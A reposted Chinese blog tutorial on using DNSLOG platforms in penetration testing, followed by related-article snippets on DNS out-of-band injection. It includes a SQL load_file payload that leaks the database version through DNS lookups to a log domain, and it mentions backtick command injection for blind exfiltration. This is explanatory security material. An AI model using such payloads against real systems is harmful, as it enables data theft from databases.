DNSLOG在渗透测试中的玩法儿

最新推荐文章于 2024-08-23 04:49:43 发布
最新推荐文章于 2024-08-23 04:49:43 发布
阅读量872 收藏
点赞数
文章标签: 运维 网络 操作系统
原文链接:http://www.cnblogs.com/nul1/p/10193462.html
版权

首先了解一下DNS是啥???

  DNS(Domain Name System,域名系统),万维网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过域名,最终得到该域名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RFC 2136对DNS的动态更新进行说明,RFC 2308对DNS查询的反向缓存进行说明。简单的说就是一个翻译系统,把域名翻译成IP的一个系统。

那么顾名思义DNSLOG就是专门记录DNS的日志的咯。

你每访问一遍域名,DNSLOG都会记录下来。

这里拿土司的做演示案例:

t00ls.6296ab741e9180de941dcdcb1ca2d088.tu4.org

首先我先ping一下这个域名44呐。

可以发现一个问题,就是他把t00ls给记录了。

那么问题来了。他记录这个有啥好处呢????

假设现在有一个命令执行啥的。但是看不到返回结果,是不是可以通过这个进行?比如linux中的反引号是可以进行命令执行的,假设可以进行命令注入那么岂不就是也可以使用这个直接进行注入???

还有就是在注入里的时候load_file会自动发送dns查询,所以可以直接使用load_file读取到。

select load_file('\\\\',version(),'.dnslog地址')

 

转载于:https://www.cnblogs.com/nul1/p/10193462.html

weixin_30558305
关注
《WEB安全渗透测试》(28)Burp Collaborator-dnslog外带技术
午夜安全
08-01 2604
1)打开BurpSuite,第一步选择“Projectoptions”,第二步选择“Misc”,第三步选择“UsethedefaultCollaboratorserver”(使用默认配置的外带服务器,如果想使用自己的服务器,可以在下面自由配置),第四步点击“Runhealthcheck..”测试外带服务器是否可以正常工作。这两个平台,他们是免费的DNSlog平台,我们利用它们可以监控DNS解析记录和HTTP访问记录,这对我们验证一些漏洞非常有帮助。...
渗透测试(四)DNS-log注入
Cobb_L
09-03 1175
DNS log注入 测试靶场(掌控安全学院靶场):https://hack.zkaq.cn/battle/target?id=10679db0fd3523e5 分析:挖掘到目标网站有注入点,可通过DNS-log注入,拿到想要的数据 明白DNS原理,知道域名解析时域名服务器会记录log,但在别人服务器上我们看不到该log,则找工具:dnslog.cn 或者 ceye.io 上去回显出我们想要的数据 以mysql为例,构造注入语句,以load_file()函数配合dns-log得到数据 mysqlloa
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 960
通常我们面对SQL注入过程没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
【技巧】DNSlog外带文件
qinjilll的博客
08-23 1166
我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名等的访问信息,类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。
浅析DNSlog渗透测试的实战技巧
热门推荐
道阻且长,行则将至。
05-23 1万+
文章目录前言SSRF 盲打XSS的盲打XXE的盲打SQL的盲注RCE的盲打总结 前言 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把想获得的数据外带出来。 DNS 的全称是 Domain Name System(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如 www.baidu.com,网络上的 DNS Server 会将该域名解析,并找到对应的真实 IP 如 127.0.0.1,使用户可以访问这台服务器上相
写bat脚本双击执行
qq_35911118的博客
04-08 2933
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 6175
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
DNSLog渗透测试活动事件
08-11
渗透测试DNSlog通常被用于以下场景:SQL注入盲注、XSS盲打、无回显的命令执行、无回显的SSRF和无回显的XXE(Blind XXE)。通过使用DNSlog渗透测试人员可以获取目标系统的敏感信息,并进一步分析和攻击目标...
dnslog server
09-08
1. **渗透测试**:在渗透测试DNSlog Server可以用来监控潜在的恶意活动,如DNS隧道ing、域名滥用等。测试者可以通过分析DNS日志,找出可能的安全漏洞或异常行为,帮助改善网络安全策略。 2. **应急响应**:在...
网络安全之渗透测试20w字全套笔记
最新发布
08-25
DNSLOG Xpath注入 SSTI 命令注入 PHPMyAdmin利用 PHP-FPM之RCE PHPstudy后门 IIS写权限 绕过WAF 数据库 命令执行 CmdHijack Fuzz目录 web程序漏洞 编辑器漏洞 邮件地址payload 从LFI到RCE Web server日志分析命令 ...
mysql dnslog_渗透技巧:使用dnslog加快盲注速度 · C1imber’s Blog
weixin_34624426的博客
02-07 629
sql盲注分为基于bool的盲注和基于时间的盲注,大家都知道,盲注是在页面没有显示位并且没有报错信息的时候,通过构造payload使页面返回的内容不同或者是页面响应的时间不同从而去判断出数据库的数据,不管是bool盲注还是时间盲注,在进行判断的时候都需要一个字符一个字符的去判断,虽然二分法可以加快盲注的速度,但是还有一种更好的办法,那就是使用dnslog,具体过程如下图由上图可以看出要进行dns...
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1470
盲注代替 DNS logDNS日志,域名解析的记录。
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1053
渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 4789
我们在上一篇文章我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台,DNSLog的平台非常的多,但是实际上大部分的DNSLog的平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 2363
创新蓝队-针对DNSlog数据外带攻击的应急与预防
渗透测试工具分享】【dnslog服务器搭建指导】
一个程序员
07-16 5042
dnslog服务器
DNSlog渗透测试的应用
demopy’s blog
12-25 1511
预备知识 dns(域名解析): 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说得简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网的地址是数字的IP地址
合理利用DNSLOG进行无回显安全测试
weixin_34220963的博客
01-02 2744
在实际测试一些网站的安全性问题的时候,有些测试命令执行后是无回显的,我们可以写脚本来进行盲注,但有些网站会封禁掉我们的ip地址,这样我们可以通过设置ip代理池解决,但是遇到盲注往往效率很低,所以产生了DNSlog注入。 在使用dnslog之前我们需要先了解一下反引号符号:符号:`名称:反引号,上分隔符位置:反引号,这个字符一般在键盘的左上角,数字1的左边,不要将其同单引号混淆作用:反引号括起来的字...
Dnslog在SQL注入的利用
weixin_33754913的博客
07-11 323
参考文献:www.anquanke.com/post/id/98096https://bbs.pediy.com/thread-223881.htm DNSlog在Web攻击的利用 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获得的数据外带出来。 常用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值